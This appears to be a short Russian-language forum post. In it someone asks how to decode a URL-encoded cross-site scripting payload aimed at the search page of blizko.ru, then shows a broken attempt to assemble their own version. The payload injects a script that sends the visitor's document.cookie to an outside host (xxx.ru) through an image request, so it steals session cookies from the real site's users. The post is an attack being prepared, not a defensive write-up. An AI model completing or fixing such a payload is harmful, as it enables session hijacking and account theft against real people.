http://www.blizko.ru/goodlist?q=%22%3E%3Cscript%3Eimg+%3D+new+Image%28% 29%3B+img.src+%3D+%22http%3A%2F%2Fxxx.ru%2Fs.gif%3 F%22%2Bdocument.cookie%3B%3C%2Fscript%3E
как расшифровывается???

заменяю alert('ggg') на "><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>

получаю нерабочий
http://www.blizko.ru/goodlist?q=1%22%3E%3Cscript%3E"><script>img = new Image(); img.src = "http://xxx.ru/s.gif?"+document.cookie;</script>%3C/script%3E